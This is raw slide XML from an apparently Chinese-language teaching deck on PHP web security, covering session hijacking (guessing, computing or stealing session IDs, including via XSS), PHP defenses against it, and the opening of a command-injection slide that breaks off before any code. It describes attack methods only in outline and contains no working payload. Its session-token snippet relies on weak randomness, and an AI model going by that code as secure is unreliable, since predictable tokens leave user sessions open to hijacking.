              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> ……</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5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>结束语</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>关于网站漏洞攻击和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>注入的形式还有很多，我们今天只是拿出一些是内容来作为讲解，我们的目的不是教给大家如何去攻击或者注入，而是告诉大家要写出安全健壮的代码，就要不断提高</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>安全代码的意识</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，让我们的代码各家规范和符合商业的需求。</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文本框 1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4016026" y="2049464"/>
            <a:ext cx="48133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Narrow"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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="6600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9933"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>感谢聆听！</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3076" name="椭圆 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6138334" y="3189289"/>
            <a:ext cx="71967" cy="53975"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="95B3D7"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{91240B29-F687-4F45-9708-019B960494DF}">
              <a14:hiddenLine xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" w="9525">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:round/>
              </a14:hiddenLine>
            </a:ext>
          </a:extLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="3200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow"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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="3077" name="直接连接符 6"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3699934" y="3211513"/>
            <a:ext cx="2300817" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="95B3D7"/>
            </a:solidFill>
            <a:round/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:noFill/>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="3078" name="直接连接符 7"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6347884" y="3211513"/>
            <a:ext cx="2302933" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="95B3D7"/>
            </a:solidFill>
            <a:round/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:noFill/>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3085" name="文本框 13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3962401" y="3305176"/>
            <a:ext cx="430741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Narrow"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itchFamily="34" charset="0"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9933"/>
                </a:solidFill>
                <a:latin typeface="Tempus Sans ITC" pitchFamily="82" charset="0"/>
              </a:rPr>
              <a:t>THANK YOU FOR YOUR ATTENTION</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF9933"/>
              </a:solidFill>
              <a:latin typeface="Tempus Sans ITC" pitchFamily="82"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5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>session</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>session</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>攻击是黑客最常用到的攻击手段之一。当一个用户访问某一个网站时，为了免客户每进人一个页面都要输人账号和密码，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>设置了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>session</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>用于方便用户的使用和访向。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> session</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>攻击最常见的就是会话劫持，也就是黑客通过各种攻击手段获取用户的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>sessionID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>，然后利用被攻击用户的身份来登录相应网站。</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5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>攻击者获取</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>sessionID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>的方法</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>暴力破解</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>尝试各种</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>sessionID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，直到破解为止</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>计算</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>如果</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>session id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>使用非随机的方式产生，那么就有可能计算出来</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>窃取</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>使用网络截获，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>xss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>攻击等方法获得</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>会话劫持的攻击步骤</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="内容占位符 3" descr="wKioL1f_pYiioqxXAAB6MPqbUAI99.jpeg-s_3026539322.jpeg"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1343031" y="1655488"/>
            <a:ext cx="9501187" cy="5108637"/>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5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>session</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>漏洞的防范</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>定期更换</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>sessionID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，可以用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>自带函数来实现</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>session_regenerate_id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(true);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>更换</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>session</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>名称，通常情况下</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>session</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>的默认名称是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>PHPSESSID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，这个变量一般保存在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>cookie </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>中，可以更改了它的名称阻档黑客的部分攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>session_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mysessionid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>关闭透明化的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>sessionID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，所谓透明化是指</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>请求没有使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>cookies</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>来制定</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>sessionID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>时，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>sessionID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>使用链接来传递。修改</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>php.ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>文件 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>session.use_trans_sid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> = 0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>传递隐藏参数，攻击者虽然能获取</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>session</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>数据，但是无法得知</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>seid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>的值，只要检查</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>seid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>的值，就可以确认当前页面是否是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>程序自己调用的。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>seid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> = md5(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>uniqid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(rand()), TRUE));	 $_SESSION["</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>seid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"] = $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>seid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>;</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5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>命令注入攻击</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>文件漏洞通常是由于网站开发者在进行网站设计时对外部提供的数据缺乏充分的过滤导致黑客利用其中的漏洞在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>进程上执行相应的命令。假如在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>lsm.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>中包含这样一段代码</a:t>
            </a:r>
            <a:r>
